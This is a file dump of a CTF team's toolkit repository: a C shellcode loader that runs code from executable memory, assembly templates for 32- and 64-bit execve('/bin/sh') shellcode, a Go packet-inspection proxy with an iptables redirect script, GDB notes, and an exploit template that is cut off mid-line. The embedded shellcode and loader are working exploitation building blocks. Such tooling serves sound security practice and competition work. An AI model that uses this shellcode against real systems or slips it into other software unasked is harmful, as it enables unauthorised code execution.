├── NetworkProxy ├── Makefile ├── tproxy.sh └── proxy.go ├── ShellcodeTester ├── Makefile └── run.c ├── ShellcodeBuilder ├── shellcode32.asm ├── Makefile └── shellcode64.asm ├── LICENSE ├── gdb.md ├── README.md └── ExploitTemplates ├── python2.py └── python3.py /NetworkProxy/Makefile: -------------------------------------------------------------------------------- 1 | all: proxy 2 | 3 | proxy: proxy.go 4 | go build -o proxy proxy.go 5 | 6 | clean: 7 | rm proxy 8 | -------------------------------------------------------------------------------- /ShellcodeTester/Makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | TARGET=run 3 | SRC=run.c 4 | 5 | default : 32 6 | 7 | 32 : $(SRC) 8 | $(CC) -m32 -o $(TARGET) $(SRC) 9 | 10 | 64 : $(SRC) 11 | $(CC) -m64 -o $(TARGET) $(SRC) 12 | 13 | clean: 14 | rm $(TARGET) 15 | 16 | -------------------------------------------------------------------------------- /ShellcodeBuilder/shellcode32.asm: -------------------------------------------------------------------------------- 1 | section .text 2 | ; http://shell-storm.org/shellcode/files/shellcode-752.php 3 | xor ecx, ecx 4 | mul ecx 5 | push ecx 6 | push 0x68732f2f ;; hs// 7 | push 0x6e69622f ;; nib/ 8 | mov ebx, esp 9 | mov al, 11 10 | int 0x80 11 | -------------------------------------------------------------------------------- /ShellcodeBuilder/Makefile: -------------------------------------------------------------------------------- 1 | 32: shellcode32.asm 2 | nasm -f elf32 shellcode32.asm 3 | objcopy -O binary shellcode32.o shellcode 4 | rm shellcode32.o 5 | 6 | 64: shellcode64.asm 7 | nasm -f elf64 shellcode64.asm 8 | objcopy -O binary shellcode64.o shellcode 9 | rm shellcode64.o 10 | 11 | clean: 12 | rm shellcode 13 | -------------------------------------------------------------------------------- /ShellcodeBuilder/shellcode64.asm: -------------------------------------------------------------------------------- 1 | section .text 2 | ; http://www.exploit-db.com/exploits/13691/ 3 | xor rdx, rdx 4 | mov qword rbx, '//bin/sh' 5 | shr rbx, 0x8 6 | push rbx 7 | mov rdi, rsp 8 | push rax 9 | push rdi 10 | mov rsi, rsp 11 | mov al, 0x3b 12 | syscall 13 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2014 KIT CTF Team 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | -------------------------------------------------------------------------------- /NetworkProxy/tproxy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Transparent proxy 4 | # 5 | 6 | if [[ $# -ne 2 ]]; then 7 | echo "Usage: $0 rhost rport" 8 | exit 0 9 | fi 10 | 11 | if [[ $EUID -ne 0 ]]; then 12 | echo "This script must be run as root" 1>&2 13 | exit 1 14 | fi 15 | 16 | host=$1 17 | dport=$2 18 | tmpport1=$RANDOM 19 | tmpport2=$RANDOM 20 | 21 | # create new queue 22 | iptables -t nat -N proxyqueue 23 | 24 | # redirect all incoming packets to new queue first 25 | iptables -t nat -I OUTPUT 1 -j proxyqueue 26 | 27 | for ip in $(dig +short $host); do 28 | # redirect desthost:destport -> localhost:tmpport1 29 | iptables -t nat -A proxyqueue -p tcp -d $ip --dport $dport -j DNAT --to-destination 127.0.0.1:$tmpport1 30 | done 31 | 32 | # redirect desthost:tmpport2 -> desthost:destport 33 | ip=$(dig +short $host | head -1) 34 | iptables -t nat -A proxyqueue -p tcp -d $ip --dport $tmpport2 -j DNAT --to-destination $ip:$dport 35 | 36 | # start proxy 37 | ./proxy 127.0.0.1:$tmpport1 $ip:$tmpport2 38 | 39 | # revert first rule 40 | iptables -t nat -D OUTPUT 1 41 | 42 | # flush queue 43 | iptables -t nat -F proxyqueue 44 | 45 | # delete queue 46 | iptables -t nat -X proxyqueue 47 | -------------------------------------------------------------------------------- /gdb.md: -------------------------------------------------------------------------------- 1 | GDB Basics 2 | ========== 3 | 4 | If you have the source, compile with -g to enable debug information, gdb then has access to the source code. 5 | 6 | ### Show register content 7 | 8 | i r 9 | (info registers) 10 | 11 | ### Start execution 12 | 13 | r 14 | r < input_file 15 | r -x -y -z blabla 16 | 17 | ### Set a breakpoint 18 | 19 | b main (needs symbols) 20 | b *0x08041234 21 | 22 | ### Continue execution 23 | 24 | c 25 | 26 | ### Single Step 27 | 28 | ni/nexti (treats a 'call' as one instruction) 29 | si/stepi (also steps into the callee) 30 | 31 | next (needs -g, next source line) 32 | step (needs -g, next source line) 33 | 34 | ### Display memory 35 | 36 | x/32wx $esp 37 | x/16gx 0x08049876 38 | x/f $eax (float) 39 | x/20i main (disassemble) 40 | 41 | #### Sizes 42 | 43 | b byte 44 | h 16bit word 45 | w 32bit word 46 | g 64bit word 47 | 48 | ### Show call stack 49 | 50 | bt 51 | (backtrace) 52 | 53 | ### Show process memory layout 54 | 55 | info proc mappings 56 | 57 | ### Execute shell commands 58 | 59 | !ls 60 | 61 | ### Show source code of function (needs -g) 62 | 63 | list main 64 | 65 | ### Display current instruction on each break/step 66 | 67 | display/i $eip 68 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | #CTFCODE 2 | 3 | Collection of somewhat useful stuff for CTFs. 4 | 5 | ##Contents 6 | 7 | ###./ShellcodeTester 8 | 9 | Simple tool to load and execute shellcode, either from stdin or from a file. 10 | Supports x32 and x64. 11 | 12 | Usage: 13 | 14 | ```bash 15 | cd ShellcodeTester 16 | make 32 17 | ./run /path/to/my/shellcode 18 | ``` 19 | 20 | > Obviously, be careful with this :) 21 | 22 | ###./ShellcodeBuilder 23 | 24 | Basically just a Makefile and assembly templates to build custom shellcode. 25 | 26 | Usage: 27 | 28 | ```bash 29 | cd ShellcodeBuilder 30 | # write your shellcode 31 | vim shellcode32.asm 32 | make 32 33 | ``` 34 | 35 | Afterwards go ahead and directly test your new code with the ShellcodeTester: 36 | 37 | ```bash 38 | ../ShellcodeTester/run shellcode 39 | ``` 40 | 41 | ###./ExploitTemplates 42 | 43 | These mostly take care of the networking stuff so your exploit doesn't have to, but they also provide some commonly needed funtionality, e.g. packing and unpacking of binary data. 44 | 45 | See [here](http://kitctf.de/writeups/9447ctf2014/2014/12/01/europe-writeup/) for a usage example (the code uses an older version of the templates though) or just play around with them a bit on your own. 46 | 47 | ###./NetworkProxy 48 | 49 | A simple network proxy. Supports live inspection and manipulation of packets passing through it. 50 | 51 | Usage: 52 | 53 | ```bash 54 | cd NetworkProxy 55 | make 56 | ./proxy 127.0.0.1:8000 kitctf.de:80 57 | ``` 58 | -------------------------------------------------------------------------------- /ShellcodeTester/run.c: -------------------------------------------------------------------------------- 1 | /* 2 | * run.c - test shellcode. 3 | * 4 | * (c) 2014 Samuel Groß 5 | */ 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | /* should be enough to hold your shellcode, if not just set this to a higher value */ 13 | #define BUFSIZE 4096 14 | /* set to 1 to enable debugging, will break before executing the shellcode */ 15 | #define DEBUGGING 0 16 | 17 | /* either paste your shellcode in here ... */ 18 | char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" 19 | "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; 20 | 21 | int main(int argc, char* argv[]) 22 | { 23 | size_t len; 24 | char *buf, *ptr; 25 | 26 | printf("[*] allocating executable memory...\n"); 27 | buf = mmap(NULL, BUFSIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); 28 | ptr = buf; 29 | printf("[+] buffer @ %p\n", buf); 30 | 31 | #if DEBUGGING 32 | ptr[0] = '\xcc'; 33 | ptr++; 34 | #endif 35 | 36 | /* ... or pass it as filename to the program */ 37 | if (argc > 1) { 38 | printf("[*] reading shellcode from file...\n"); 39 | FILE *f = fopen(argv[1], "r"); 40 | if (!f) { 41 | fprintf(stderr, "[-] Cannot open %s: %s\n", argv[1], strerror(errno)); 42 | exit(-1); 43 | } 44 | len = fread(ptr, 1, BUFSIZE, f); 45 | 46 | fclose(f); 47 | } else { 48 | len = sizeof(shellcode); 49 | printf("[*] copying shellcode...\n"); 50 | memcpy(ptr, shellcode, len); 51 | } 52 | printf("[+] done, size of shellcode: %zi bytes\n", len); 53 | 54 | printf("[*] jumping into shellcode...\n\n"); 55 | (*(void (*)()) buf)(); 56 | 57 | return 0; 58 | } 59 | -------------------------------------------------------------------------------- /NetworkProxy/proxy.go: -------------------------------------------------------------------------------- 1 | // 2 | // Simple network proxy. Allows live inspection and manipulation of packets. 3 | // 4 | // Copyright (c) 2015 Samuel Groß 5 | // 6 | 7 | package main 8 | 9 | import ( 10 | "os" 11 | "log" 12 | "fmt" 13 | "net" 14 | "encoding/hex" 15 | ) 16 | 17 | // Write your own packet handler with this signature 18 | type PacketHandler func (packet []byte) []byte 19 | 20 | // Simple packet handler to dump the packets to the console 21 | func dumpPacketHandler(tag string) PacketHandler { 22 | return func (packet []byte) []byte { 23 | fmt.Println(tag) 24 | fmt.Println("------------------------------------------------------") 25 | fmt.Println(hex.Dump(packet)) 26 | return packet 27 | } 28 | } 29 | 30 | 31 | func usage() { 32 | fmt.Printf("%s \n", os.Args[0]) 33 | fmt.Println("Address format: host:port") 34 | } 35 | 36 | // Relay packets from the source to the destination. Call handler for each packet. 37 | func relay(source, dest net.Conn, handler PacketHandler) { 38 | in := make([]byte, 4096) 39 | 40 | for { 41 | n, err := source.Read(in) 42 | if n == 0 || err != nil { 43 | // source closed on use, pass that on so dest closes as well 44 | log.Printf("Connection closed: %s\n", source.RemoteAddr().String()) 45 | dest.Close() 46 | return 47 | } 48 | 49 | out := handler(in[:n]) 50 | 51 | // we can ignore the case where Write() fails since the other goroutines Read() will also fail in that case 52 | dest.Write(out) 53 | } 54 | } 55 | 56 | func proxy(client, server net.Conn) { 57 | go relay(client, server, dumpPacketHandler("Client: " + client.RemoteAddr().String())) 58 | go relay(server, client, dumpPacketHandler("Server: " + server.RemoteAddr().String())) 59 | } 60 | 61 | func main() { 62 | if len(os.Args) < 3 { 63 | usage() 64 | os.Exit(0) 65 | } 66 | 67 | ln, err := net.Listen("tcp", os.Args[1]) 68 | if err != nil { 69 | log.Fatal(err) 70 | } 71 | 72 | log.Printf("Ready. Connect to %s\n", os.Args[1]) 73 | 74 | for { 75 | client, err := ln.Accept() 76 | if err != nil { 77 | log.Print(err) 78 | continue 79 | } 80 | 81 | server, err := net.Dial("tcp", os.Args[2]) 82 | if err != nil { 83 | log.Fatal(err) 84 | } 85 | 86 | log.Printf("New connection from %s\n", client.RemoteAddr().String()) 87 | go proxy(client, server) 88 | } 89 | } 90 | -------------------------------------------------------------------------------- /ExploitTemplates/python2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: UTF-8 3 | 4 | import re 5 | import sys 6 | import time 7 | import struct 8 | import socket 9 | import select 10 | 11 | TARGET = ('127.0.0.1', 4444) 12 | 13 | # 14 | # Helper Functions 15 | # 16 | def p(d, fmt='